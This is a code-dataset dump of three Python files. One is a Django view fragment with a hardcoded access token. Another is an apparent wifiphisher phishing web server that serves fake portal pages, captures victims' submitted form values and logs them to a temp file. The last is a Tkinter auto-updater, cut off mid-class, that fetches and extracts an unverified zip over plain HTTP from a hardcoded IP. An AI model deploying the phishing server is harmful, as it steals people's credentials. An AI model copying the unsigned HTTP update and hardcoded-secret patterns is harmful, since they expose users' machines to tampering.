'\"http://localhost:8080/api/get/user/\", {access_token:\\'72b346aaaea45f82f0b8055e1fcf344f550b5025\\', user_id:1}'\n elif page == 'chapters':\n api_url = ''\n elif page == 'characters':\n api_url = '\"http://localhost:8080/api/get/character/\", {access_token:\\'72b346aaaea45f82f0b8055e1fcf344f550b5025\\', character_id:1}'\n else:\n api_url = ''\n\n context = {\n 'api_url': api_url,\n 'page': page\n }\n return render(request, 'main.html', context)\n\n\n","sub_path":"gameheart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"10953552","text":"import SimpleHTTPServer\nimport BaseHTTPServer\nimport httplib\nimport SocketServer\nimport ssl\nimport socket\nimport cgi\nimport os\nfrom constants import *\n\ntemplate = False\nterminate = False\n\nclass SecureHTTPServer(BaseHTTPServer.HTTPServer):\n \"\"\"\n Simple HTTP server that extends the SimpleHTTPServer standard\n module to support the SSL protocol.\n\n Only the server is authenticated while the client remains\n unauthenticated (i.e. the server will not request a client\n certificate).\n\n It also reacts to self.stop flag.\n \"\"\"\n def __init__(self, server_address, HandlerClass):\n SocketServer.BaseServer.__init__(self, server_address, HandlerClass)\n self.socket = ssl.SSLSocket(\n socket.socket(self.address_family, self.socket_type),\n keyfile=PEM,\n certfile=PEM\n )\n\n self.server_bind()\n self.server_activate()\n\n def serve_forever(self):\n \"\"\"\n Handles one request at a time until stopped.\n \"\"\"\n self.stop = False\n while not self.stop:\n self.handle_request()\n\n\nclass SecureHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n \"\"\"\n Request handler for the HTTPS server. 
It responds to\n everything with a 301 redirection to the HTTP server.\n \"\"\"\n def do_QUIT(self):\n \"\"\"\n Sends a 200 OK response, and sets server.stop to True\n \"\"\"\n self.send_response(200)\n self.end_headers()\n self.server.stop = True\n\n def setup(self):\n self.connection = self.request\n self.rfile = socket._fileobject(self.request, \"rb\", self.rbufsize)\n self.wfile = socket._fileobject(self.request, \"wb\", self.wbufsize)\n\n def do_GET(self):\n self.send_response(301)\n self.send_header('Location', 'http://' + NETWORK_GW_IP + ':' + str(PORT))\n self.end_headers()\n\n def log_message(self, format, *args):\n return\n\n\nclass HTTPServer(BaseHTTPServer.HTTPServer):\n \"\"\"\n HTTP server that reacts to self.stop flag.\n \"\"\"\n\n def serve_forever(self):\n \"\"\"\n Handle one request at a time until stopped.\n \"\"\"\n self.stop = False\n while not self.stop:\n self.handle_request()\n\n\nclass HTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n \"\"\"\n Request handler for the HTTP server that logs POST requests.\n \"\"\"\n def redirect(self, page=\"/\"):\n self.send_response(301)\n self.send_header('Location', page)\n self.end_headers()\n\n def do_QUIT(self):\n \"\"\"\n Sends a 200 OK response, and sets server.stop to True\n \"\"\"\n self.send_response(200)\n self.end_headers()\n self.server.stop = True\n\n def do_GET(self):\n global template\n\n template_path = template.get_path()\n wifi_webserver_tmp = \"/tmp/wifiphisher-webserver.tmp\"\n with open(wifi_webserver_tmp, \"a+\") as log_file:\n log_file.write('[' + T + '*' + W + '] ' + O + \"GET \" + T +\n self.client_address[0] + W + \"\\n\"\n )\n log_file.close()\n if not os.path.isfile(\"%s/%s\" % (template_path, self.path)):\n self.path = \"index.html\"\n\n if self.path.endswith(\".html\"):\n self.send_response(200)\n self.send_header('Content-type', 'text-html')\n self.end_headers()\n # Send file content to client\n self.wfile.write(template.render(self.path).encode('utf-8'))\n return\n # Leave binary and other data to default handler.\n else:\n os.chdir(template_path)\n SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)\n\n def do_POST(self):\n global terminate\n redirect = False\n form = cgi.FieldStorage(\n fp=self.rfile,\n headers=self.headers,\n environ={'REQUEST_METHOD': 'POST',\n 'CONTENT_TYPE': self.headers['Content-type'],\n })\n if not form.list:\n return\n for item in form.list:\n if item.name and item.value and POST_VALUE_PREFIX in item.name:\n redirect = True\n wifi_webserver_tmp = \"/tmp/wifiphisher-webserver.tmp\"\n with open(wifi_webserver_tmp, \"a+\") as log_file:\n log_file.write('[' + T + '*' + W + '] ' + O + \"POST \" +\n T + self.client_address[0] +\n R + \" \" + item.name + \"=\" + item.value +\n W + \"\\n\"\n )\n log_file.close()\n if redirect:\n self.redirect(\"/upgrading.html\")\n terminate = True\n return\n self.redirect()\n\n def log_message(self, format, *args):\n return\n\n\ndef stop_server(port=PORT, ssl_port=SSL_PORT):\n \"\"\"\n Sends QUIT request to HTTP server running on localhost:\n \"\"\"\n conn = httplib.HTTPConnection(\"localhost:%d\" % port)\n conn.request(\"QUIT\", \"/\")\n conn.getresponse()\n\n conn = httplib.HTTPSConnection(\"localhost:%d\" % ssl_port)\n conn.request(\"QUIT\", \"/\")\n conn.getresponse()\n\n\ndef serve_template(t):\n global template\n template = t\n","sub_path":"phishinghttp.py","file_name":"phishinghttp.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} 
+{"seq_id":"485741142","text":"from tkinter import *\nfrom tkinter import ttk\nimport os\nfrom os import path\nimport requests\nimport zipfile\nimport io\n\nimport subprocess\nimport shutil\nimport json\n\nimport socket\n\nimport threading\nimport time\nimport logging\nimport configparser\n\nimport urllib\nfrom urllib import request\nfrom urllib import error\n\n\n# Logger\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\nfile_handler = logging.FileHandler(filename='../logs/detect.log', encoding=\"UTF-8\")\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s : %(message)s')\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\n\nclass DetectGui:\n def __init__(self, master, detect_global_info):\n self.master = master\n self.detect_global_info = detect_global_info\n self._create_gui()\n # gif running\n # self.create_run_run_gif_thread()\n # infinity loop run once every three seconds\n self._run_detect_function()\n # self._create_run_detect_thread = threading.Timer(3, self._run_detect_function)\n # self._create_run_detect_thread.start()\n\n def _create_gui(self):\n self.master.configure(background='#e4f9ff') # #e4f9ff 5c821A DCE1F9\n\n # 透明感覺 transparent\n # self.master.attributes('-alpha', 0.9)\n # 抓取檔案路近位置\n self.direction_path = os.getcwd()\n # window 視窗坐上繳小圖示\n self.master.iconbitmap(\"{}/src/hyweb.ico\".format(self.direction_path))\n self.master.title(\"\")\n\n # 改變視窗大小\n self.master.resizable(False, False)\n self.master.state('zoomed')\n\n # 全視窗\n self.master.attributes('-fullscreen', True)\n self.master.geometry(\"300x200+1+1\")\n\n # self.master.overrideredirect(True) ---> 開啟後可更改視窗全螢幕(geometry)的鎖定\n # self.master.geometry(\"{0}x{1}+0+0\".format(self.master.winfo_screenwidth(), self.master.winfo_screenheight()))\n self.master.focus_set() # <-- move focus to this widget\n\n # 用esc就可以觀視窗\n self.master.bind(\"\", lambda e: self.master.destroy())\n\n # 讓視窗在最上層\n self.master.attributes('-topmost', True)\n\n # 把 X(exit) 功能關閉, alt + f4 也不行 呼叫 下方的 空的 callaback 程式 (disable_event)\n self.master.protocol(\"WM_DELETE_WINDOW\", self.disable_event)\n\n # 圖片連結 (記得 產出EXE檔案的時候 圖片連結沒有 EXE 會爆掉!! 
最好的方式 就是放在同一下的 src/xxx.png )\n # C:\\\\Users\\\\Yuting\\\\Desktop\\\\HyWeb\\\\others\\\\icon\\\\hyweb.png\n # D:\\\\HyWeb\\\\Python\\\\Project\\\\src\\\\Chihlee.png --> chihlee logo\n\n # 抓取目前路徑位置\n self.cwd = os.getcwd()\n # 設定路徑位置\n # 在 python compiler 中 ---> base_path = os.path.abspath(os.path.join(os.path.dirname( __file__ )))\n self.base_path = os.path.abspath(os.path.join(os.getcwd()))\n # 在 exe 中 ---> base_path = os.path.abspath(os.path.join(os.getcwd()))\n self.file_path = path.abspath(path.join(self.base_path, \"..\"))\n\n self.master.rowconfigure(0, weight=1)\n self.master.rowconfigure(1, weight=1)\n self.master.rowconfigure(2, weight=1)\n self.master.rowconfigure(3, weight=1)\n self.master.rowconfigure(4, weight=1)\n self.master.rowconfigure(5, weight=1)\n self.master.rowconfigure(6, weight=1)\n self.master.rowconfigure(7, weight=1)\n\n self.master.columnconfigure(0, weight=1)\n self.master.columnconfigure(1, weight=1)\n self.master.columnconfigure(2, weight=1)\n self.master.columnconfigure(3, weight=1)\n self.master.columnconfigure(4, weight=1)\n self.master.columnconfigure(5, weight=1)\n self.master.columnconfigure(6, weight=1)\n self.master.columnconfigure(7, weight=1)\n self.master.columnconfigure(8, weight=1)\n self.master.columnconfigure(9, weight=1)\n self.master.columnconfigure(10, weight=1)\n self.master.columnconfigure(11, weight=1)\n self.master.columnconfigure(12, weight=1)\n self.master.columnconfigure(13, weight=1)\n self.master.columnconfigure(14, weight=1)\n\n self._img = PhotoImage(file='{}/src/hyweb_logo.png'.format(self.direction_path))\n\n # costume color 特製FRAME的顏色 (未來等python: def, class, module 熟一點) 可改成程式產生\n fm_bg_1 = '#FF6F00' # #FF6F00 #FFCCBC\n fm_bg_2 = '#9CCC65' # #9CCC65 #C5CAE9\n fm_bg_3 = '#9CCC65' # #9CCC65 #C5E1A5\n fm_bg_4 = '#F06292' # #F06292 #F8BBD0\n fm_bg_5 = '#4DD0E1' # #4DD0E1 #FFE0B2\n fm_bg_6 = '#7ee2ff'\n fm_bg_7 = '#e4f9ff' # 95A5A6\n\n fm_bg_upper = '#A4CABC' # 426E86 E2E8E4 7BA4A8 78A5A3 5978a6 1E656D FFB266 #7DCEA0 #F0B27A #A2D9CE 90AFC5\n fm_bg_lower = '#FFB266' # E2E8E4 7BA4A8 78A5A3 5978a6\n\n self.style_frame_bg = ttk.Style()\n self.style_frame_bg.configure('BG1.TFrame', background=fm_bg_1)\n\n self.style_frame_bg.configure('BG2.TFrame', background=fm_bg_2)\n self.style_frame_bg.configure('BG3.TFrame', background=fm_bg_3)\n self.style_frame_bg.configure('BG4.TFrame', background=fm_bg_4)\n self.style_frame_bg.configure('BG5.TFrame', background=fm_bg_5)\n self.style_frame_bg.configure('BG6.TFrame', background=fm_bg_7)\n\n # NEW LAYOUT CUSTOM STYLE\n # #ED8C72 #FFEC5C #EAB364 #002C54 #006C84 #FFCCBB #444C5C #E7552C #FBE9E7 #EED8C9 #336B87 006C84\n self.style_frame_bg.configure('Upper_log.TFrame', background='#E2E8E4')\n\n # #85C1E9 #36688D #888C46 #0AAFF1 #90AFC5 #AEBD38 #68829E #66A5AD #75B1A9 #1E656D #4D648D #239B56 #FFCCAC #68A225 #556DAC #2988BC #217CA3 #EFB509\n # #335252 #FFCCBB #6EB5C0 #353C3F #78A5A3 #344D90 #FFBEBD #FCFCFA #FAAE3D #488a99 #A5C05B\n self.style_frame_bg.configure('Upper.TFrame', background=fm_bg_upper)\n\n # #F4D03F #F49F05 #FF4500 #EDF259 #336B87 #598234 #AEBD38 #C4DFE6 #D9B44A #F1F3CE #D0E1F9 #148F77 #FDD475 #B3DE81 #F79B77 #2F496E #E29930 #CD7213\n # #D4DDE1 #6EB5C0 #006C84 #FF8D3F #E1B16A #5CC5EF #FCFCFA #337BAE #E38533 #DBAE58 #7BA4A8\n self.style_frame_bg.configure('Lower.TFrame', background=fm_bg_lower)\n\n self.style_frame_bg.configure('Center_content.TFrame', background='snow')\n self.style_frame_bg.configure('Center_outer.TFrame', background='snow')\n\n # #FFBB00 #F9E79F #F4EADE #128277 #7D5642 
#AA4B41 #2D3033 #E2E8E4 #CE5A57 #FFB745 #B4B4B4 FB6542\n self.style_frame_bg.configure('Center_bar.TFrame', background='#E2E8E4')\n # ==========================================\n # ==========================================\n # 全新的想法唷~~ 簡單 乾淨 不花俏!!!\n # ==========================================\n\n # 抓取使用者螢幕大小\n self.screen_width = self.master.winfo_screenwidth()\n self.screen_height = self.master.winfo_screenheight()\n # 想樣的 FRAME 長寬大小\n self.width_of_frame = self.screen_width * .50\n self.height_of_frame = self.screen_height * .33\n # 計算相對大小位置\n self.x_coordinate = (self.screen_width / 2) - (self.width_of_frame / 2)\n self.y_coordinate = (self.screen_height / 2) - (self.height_of_frame / 2)\n\n # ============================ upper / lower / center frame ==============================================================\n # block gap\n self.outer_x_y = 4\n self.inner_x_y = 2\n # upper frame\n self.upper_frame_1 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_1.grid(row=0, column=0, rowspan=2, padx=(self.outer_x_y, self.inner_x_y),\n pady=(self.outer_x_y, self.inner_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_2 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_2.grid(row=2, column=0, rowspan=4, padx=(self.outer_x_y, self.inner_x_y),\n pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_3 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_3.grid(row=6, column=0, rowspan=2, columnspan=5, padx=(self.outer_x_y, self.inner_x_y),\n pady=(self.inner_x_y, self.outer_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_4 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_4.grid(row=0, column=1, rowspan=3, columnspan=5, padx=self.inner_x_y,\n pady=(self.outer_x_y, self.inner_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_5 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_5.grid(row=3, column=1, columnspan=3, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_6 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_6.grid(row=4, column=1, rowspan=2, padx=self.inner_x_y, pady=self.inner_x_y, sticky='nsew')\n # upper frame_\n self.upper_frame_7 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_7.grid(row=4, column=2, rowspan=2, columnspan=3, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_8 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_8.grid(row=0, column=6, columnspan=2, padx=self.inner_x_y,\n pady=(self.outer_x_y, self.inner_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_9 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_9.grid(row=1, column=6, columnspan=5, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_10 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_10.grid(row=2, column=6, padx=self.inner_x_y, pady=self.inner_x_y, sticky='nsew')\n # upper frame_\n self.upper_frame_11 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_11.grid(row=3, column=4, columnspan=3, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_12 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_12.grid(row=4, column=5, rowspan=4, columnspan=2, padx=self.inner_x_y,\n pady=(self.inner_x_y, self.outer_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_13 = ttk.Frame(self.master, style='Upper.TFrame')\n 
self.upper_frame_13.grid(row=2, column=7, rowspan=3, columnspan=3, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n\n # upper frame_\n self.upper_frame_14 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_14.grid(row=5, column=7, columnspan=3, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_15 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_15.grid(row=6, column=7, rowspan=2, columnspan=4, padx=self.inner_x_y,\n pady=(self.inner_x_y, self.outer_x_y), sticky='nsew')\n # upper frame_\n self.upper_frame_16 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_16.grid(row=0, column=8, columnspan=7, padx=(self.inner_x_y, self.outer_x_y),\n pady=(self.outer_x_y, self.inner_x_y), sticky='nsew')\n\n # upper frame_\n self.upper_frame_17 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_17.grid(row=1, column=11, rowspan=2, columnspan=4, padx=(self.inner_x_y, self.outer_x_y),\n pady=self.inner_x_y, sticky='nsew')\n # upper frame_\n self.upper_frame_18 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_18.grid(row=2, column=10, rowspan=4, padx=self.inner_x_y, pady=self.inner_x_y,\n sticky='nsew')\n # upper frame_\n self.upper_frame_19 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_19.grid(row=3, column=11, rowspan=4, columnspan=2, padx=self.inner_x_y,\n pady=self.inner_x_y,\n sticky='nsew')\n\n # upper frame\n self.upper_frame_20 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_20.grid(row=3, column=13, rowspan=2, columnspan=2, padx=(self.inner_x_y, self.outer_x_y),\n pady=self.inner_x_y, sticky='nsew')\n # upper frame\n self.upper_frame_21 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_21.grid(row=5, column=13, rowspan=2, columnspan=2, padx=(self.inner_x_y, self.outer_x_y),\n pady=self.inner_x_y, sticky='nsew')\n # upper frame\n self.upper_frame_22 = ttk.Frame(self.master, style='Upper.TFrame')\n self.upper_frame_22.grid(row=7, column=11, columnspan=4, padx=(self.inner_x_y, self.outer_x_y),\n pady=(self.inner_x_y, self.outer_x_y), sticky='nsew')\n\n # cneter frame 中間框框最外圍的顏色!!\n self.center_mom_frame = ttk.Frame(self.master, style='Center_outer.TFrame')\n self.center_mom_frame.place(anchor='c', relx=.5, rely=.5)\n\n # 中間區塊 (外圍) 可改變 login 框框 大小\n self.center_small_mom_frame = ttk.Frame(self.center_mom_frame, width=750, height=300,\n style='Center_bar.TFrame') # , style='Center_bar.TFrame'\n self.center_small_mom_frame.pack(fill=\"both\", expand=True, padx=5, pady=5)\n\n # 中間區塊 (內圍) 可改變 login 框框 大小\n self.center_son_frame = ttk.Frame(self.center_small_mom_frame, width=700, height=275,\n style='Center_content.TFrame') # , style='Center_content.TFrame'\n self.center_son_frame.pack(fill=\"both\", expand=True, padx=7, pady=7, ipady=30)\n # ensure a consistent GUI size\n self.center_son_frame.grid_propagate(False)\n\n self.center_son_frame.grid_rowconfigure(0, weight=0)\n self.center_son_frame.grid_rowconfigure(1, weight=1)\n self.center_son_frame.grid_rowconfigure(2, weight=1)\n self.center_son_frame.grid_rowconfigure(3, weight=1)\n\n self.center_son_frame.grid_columnconfigure(0, weight=1)\n self.center_son_frame.grid_columnconfigure(1, weight=1)\n self.center_son_frame.grid_columnconfigure(2, weight=1)\n self.center_son_frame.grid_columnconfigure(3, weight=0)\n self.center_son_frame.grid_columnconfigure(4, weight=1)\n\n # 顯示狀態\n self.detect_status = StringVar()\n 
self.detect_status.set(self.detect_global_info.detect_status)\n\n        # infinity loop flag\n        self.detect_status_flag = 'pc_open'\n        self.pc_version_ = self.detect_global_info.pc_version\n        # ============================================================================================\n\n        self.upper_frame_4_label = ttk.Label(self.center_son_frame)\n        self.upper_frame_4_label.grid(row=0, column=0, columnspan=5, padx=(5, 5), pady=(40, 0), sticky='ewsn')\n        self.hyweb_logo_img_300 = PhotoImage(file='{}/src/spaceme_550_r.png'.format(self.direction_path))\n        self.upper_frame_4_label.image = self.hyweb_logo_img_300\n        self.upper_frame_4_label.config(image=self.upper_frame_4_label.image, anchor=CENTER, background=\"snow\")\n\n        self.detect_status_label = ttk.Label(self.center_son_frame, textvariable=self.detect_status, font=(\"\", 25, \"\"))\n\n        self.detect_status_loading_img = PhotoImage(file='{}/src/uctp_version.png'.format(self.direction_path))\n        self.detect_status_label.img = self.detect_status_loading_img\n        self.detect_status_label.grid(row=2, column=1, columnspan=3, sticky='wesn')\n        self.detect_status_label.config(compound=LEFT, image=self.detect_status_label.img, background=\"snow\")\n\n        # declare a index_number for iterating \"gif -index {}\"\n        self.index_number = 0\n    # ==============================================================================================\n\n    # check whether anything is using the port\n    def sock_checker(self):\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        result = sock.connect_ex(('localhost', 5000))\n        # result == 0 means the port is in use\n        if result == 0:\n            return False\n        else:\n            return True\n\n    # call the open_main_gui bat file\n    def open_main_gui(self):\n        try:\n            subprocess.call(\"C:/Program Files/Hyweb/hyweb_desktop.bat\")\n        except:\n            print(\"Error opening the file!\")\n            logger.exception(\"Got exception on open main gui:\")\n            pass\n\n    def disable_event(self):\n        pass\n\n    # detect whether port 5000 is in use\n    def detecting_port(self):\n        threading.Timer(5, self.detecting_port).start()\n        # extra check against the flag file written by the main gui\n        if os.path.exists(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\gui_open.ini\"):\n            
# sock_checker() returning True means port 5000 is NOT in use, so the GUI should be opened\n            # i.e. main_flask was closed ---> open it again\n            if self.sock_checker():\n                # if gui_open.ini exists, delete it first, since it would confuse the port detector\n                if os.path.exists(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\gui_open.ini\"):\n                    os.remove(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\gui_open.ini\")\n                self.open_main_gui()\n            else:\n                pass\n                print(\"opened already\")\n\n    # start the port detector; minimize only once open.ini shows up\n    def detecting_port_opener(self):\n\n        for i in range(100):\n            time.sleep(1)\n            # self.master.withdraw()\n            if os.path.exists(\"C:\\Program Files\\Hyweb\\hyweb_desktop\\open.ini\"):\n                # open.ini detected: the GUI is up, so minimize the detect window\n                self.master.withdraw()\n                logger.info(\"turn on detecting_port !\")\n                self.detecting_port()\n                break\n            else:\n                logger.info(\"gui hasn't opened!!\")\n                print(\"open.ini not found, GUI not opened yet\")\n                continue\n\n        self.master.withdraw()\n\n    def create_run_run_gif_thread(self):\n        run_gif_thread = threading.Thread(target=self._run_run_gif)\n        run_gif_thread.start()\n\n    # the coolest running gif function\n    # using tkinter after function to run an infinite loop showing cool gif animation\n    def _run_run_gif(self):\n        while True:\n            time.sleep(0.05)\n            if self.index_number >= 24:\n                self.index_number = 0\n            else:\n                self.detect_status_label.img = PhotoImage(file='{}/src/loading_3.gif'.format(self.direction_path),\n                                                          format=\"gif -index {}\".format(self.index_number))\n                self.detect_status_label.config(image=self.detect_status_label.img,\n                                                anchor=CENTER,\n                                                background=\"snow\")\n                # add one to index_number\n                self.index_number += 1\n\n    # run the main detecting logic\n    def _run_detect_function(self):\n        # this function re-schedules itself every three seconds\n        self._identifier_after = self.master.after(3000, self._run_detect_function)\n        print(\"self._identifier_after: \" + self._identifier_after)\n        # pc open\n        # (pc_open) get version from hyweb_desktop: ok ---> continue , not ok ---> open old gui\n        if self.detect_status_flag == 'pc_open':\n            try:\n                # open the version file inside the local hyweb_desktop\n                file = open('{}/hyweb_desktop/hyweb_version.txt'.format(self.file_path), 'r')\n                # load it as json\n                json_file = json.load(file)\n                print(\"version file opened\")\n            except:\n                # open\n                print(\"file open exception:\")\n                logger.exception(\"Got exception on PC version_file open:\")\n                # even on an exception, move on to opening the gui\n                self.detect_status_flag = \"open_gui\"\n                # exception caught, bail out of this iteration\n                return\n            # text shown on the gui\n            self.detect_status.set(\"Connecting...\")  # initializing...\n\n            # parsing json file\n            try:\n                for key, value in json_file.items():\n                    if key == 'version':\n                        self.pc_version_ = value\n                        print(\"pc_version: {}\".format(self.pc_version_))\n                        logger.info(\"pc_version: {}\".format(self.pc_version_))\n                file.close()\n            except:\n                # open\n                print(\"file open exception:\")\n                logger.exception(\"Got exception on PC file parsing json:\")\n                # even on an exception, move on to opening the gui\n                self.detect_status_flag = \"open_gui\"\n                # exception caught, bail out of this iteration\n                return\n\n            self.detect_status_flag = \"version_compare\"\n            self.detect_status.set(\"Connecting...\")  # comparing versions\n            print(\"comparing versions!\")\n\n        # [version_compare] compare versions, set the label text and flag: same_version or different_version\n        elif self.detect_status_flag == \"version_compare\":\n            # check whether the network is reachable\n            try:\n                # Hyweb: https://mighty-harbor-53134.herokuapp.com/detect,\n                # Chihlee: 172.16.89.1, uctp: 203.68.9.151\n                # call the API for the latest version info; this is the agent url API: /sb-ac-agent/rest/ac/client/pcTerminals/clientVersion\n                req = urllib.request.urlopen(\"http://{}:{}/sb-ac-agent/rest/ac/client/pcTerminals/clientVersion\".format(self.detect_global_info.default_ip, self.detect_global_info.default_port), timeout=5)\n                # read the response as bytes\n                online_byte_req = req.read()\n                # decode to utf-8\n                online_json_file = 
online_byte_req.decode('utf-8')\n                # parse the string as json\n                online_json_data = json.loads(online_json_file)\n                # API json: value ---> version number\n                for key, value in online_json_data.items():\n                    # self-customized heroku: urllink\n                    if key == \"urllink\":\n                        self.detect_global_info.url_download_link = value\n                        print(\"url_download_link: {}\".format(self.detect_global_info.url_download_link))\n                        logger.info(\"url_download_link is available\")\n                    # API json: value ---> version number\n                    # self-customized heroku: version\n                    elif key == \"value\":\n                        self.detect_global_info.online_version = value\n                        print(\"online_version: {}\".format(self.detect_global_info.online_version))\n                        logger.info(\"online_version: {}\".format(self.detect_global_info.online_version))\n            except TimeoutError:\n                # got an exception, so just treat the existing file as the latest version\n                print(\"[TimeoutError] got exception version_compare urlopen:\")\n                logger.exception(\"Got exception on version_compare urlopen[TimeoutError]:\")\n                self.detect_status_flag = \"same_version\"\n                return\n            except urllib.error.URLError:\n                # got an exception, so just treat the existing file as the latest version\n                print(\"[urllib.error.URLError] got exception urlopen:\")\n                logger.exception(\"Got exception on urlopen[urllib.error.URLError]:\")\n                self.detect_status_flag = \"same_version\"\n                return\n            except:\n                # got an exception, so just treat the existing file as the latest version\n                print(\"[Exception in general] got exception urlopen:\")\n                logger.exception(\"Got exception on urlopen[Exception in general]:\")\n                self.detect_status_flag = \"same_version\"\n                return\n\n            if self.detect_global_info.online_version == self.pc_version_:\n                self.detect_status_flag = \"same_version\"\n            else:\n                self.detect_status_flag = \"different_version\"\n                self.detect_status.set(\"New version detected!\")\n\n        # [same_version] versions match, set the label text and flag: open_gui\n        elif self.detect_status_flag == \"same_version\":\n            self.detect_status.set(\"Connecting...\")  # comparison finished!\n            self.detect_status_flag = \"open_gui\"\n\n        # [different_version] versions differ, set the label text and flag: \"download_new_version\"\n        elif self.detect_status_flag == \"different_version\":\n            self.detect_status_flag = \"download_new_version\"\n            self.detect_status.set(\"Updating...\")\n\n        # download the new version, set the label text and flag: \"open_gui\"\n        elif self.detect_status_flag == \"download_new_version\":\n\n            # if the folder already exists, rename it first\n            if os.path.isdir(\"{}/hyweb_desktop\".format(self.file_path)):\n                logger.warning(\"Change folder name before download new version zip:\")\n                print(\"Change folder name before download new version zip:\")\n                os.rename(\"{}/hyweb_desktop\".format(self.file_path), \"{}/hyweb_desktop_old\".format(self.file_path))\n\n            try:\n                # download url: /sb-ac-agent/rest/ac/client/pcTerminals/clientFile\n                # \"http://203.68.9.151:8080/sb-ac-agent/rest/ac/client/pcTerminals/clientFile\"\n                # self.detect_global_info.url_download_link\n                r = requests.get(\"http://{}:{}/sb-ac-agent/rest/ac/client/pcTerminals/clientFile\".format(self.detect_global_info.default_ip, self.detect_global_info.default_port))\n                z = zipfile.ZipFile(io.BytesIO(r.content))\n                a = z.extractall(\"{}/\".format(self.file_path))\n                z.close()\n            except:\n                # download failed\n                logger.error(\"Got exception on downloading new_version zip file :\")\n                print(\"Got exception on downloading new_version zip file :\")\n                # download failed: if a half-created folder exists, clean it up\n                if os.path.isdir(\"{}/hyweb_desktop\".format(self.file_path)):\n                    shutil.rmtree(\"{}/hyweb_desktop\".format(self.file_path))\n                    logger.warning(\"Deleting folder from downloading_new_version_zip file exception\")\n                    print(\"Deleting folder from downloading_new_version_zip file exception\")\n                # rename the _old folder back, then set 
flag = \"open_gui\"\n                if os.path.isdir(\"{}/hyweb_desktop_old\".format(self.file_path)):\n                    os.rename(\"{}/hyweb_desktop_old\".format(self.file_path), \"{}/hyweb_desktop\".format(self.file_path))\n                    logger.warning(\"Change folder name back, from downloading_new_version_zip file exception\")\n                    print(\"Change folder name back, from downloading_new_version_zip file exception\")\n                self.detect_status_flag = \"open_gui\"\n                return\n            # zip extracted successfully\n            logger.info(\"extract zip success! YA!\")\n            print(\"extract zip success! YA!\")\n            # everything succeeded, so remove the old folder\n            if os.path.isdir(\"{}/hyweb_desktop_old\".format(self.file_path)):\n                shutil.rmtree(\"{}/hyweb_desktop_old\".format(self.file_path))\n                print(\"Deleting old folder after downloading successful!\")\n                logger.info(\"Deleting old folder after downloading successful!\")\n\n            self.detect_status_flag = \"open_gui\"\n\n        # (open_gui) open old gui\n        elif self.detect_status_flag == \"open_gui\":\n            self.detect_status.set(\"Connection complete!\")  # connected\n            self.detect_status_flag = \"detecting_port\"\n            # launch the main gui\n            self.open_main_gui()\n            print(\"open gui\")\n            logger.info(\"open gui\")\n\n        elif self.detect_status_flag == \"detecting_port\":\n            # self.master.withdraw()\n            # detecting port~~~~~~~~~~\n\n            # at this point, cancel the version-check timer\n            # self.create_run_detect_thread.cancel()\n            self.master.after_cancel(self._identifier_after)\n            logger.info(\"cancel version detect timer\")\n\n            # calling detecting_port function cancel the Timer run_detect_thread\n            self.detecting_port_opener()\n            logger.info(\"create detecting_port_opener~ \")\n\n            print(\"watching_port\")\n\n\nclass DetectGlobalInfo:\n    def __init__(self):\n        self._detect_status = 'Connecting....'\n        self._pc_version = ''\n        self._online_version = ''\n        self._url_download_link = ''\n\n        # UCTP ---> ip: 120.102.68.51, port: 8080\n        self._default_ip = '120.102.68.51'\n        self._default_port = '8080'\n\n    # default_ip getter\n    @property\n    def default_ip(self):\n        return self._default_ip\n\n    # default_ip setter\n    @default_ip.setter\n    def default_ip(self, value):\n        self._default_ip = value\n\n    # default_port getter\n    @property\n    def default_port(self):\n        return self._default_port\n\n    # default_port setter\n    @default_port.setter\n    def default_port(self, value):\n        self._default_port = value\n\n    # detect_status getter\n    @property\n    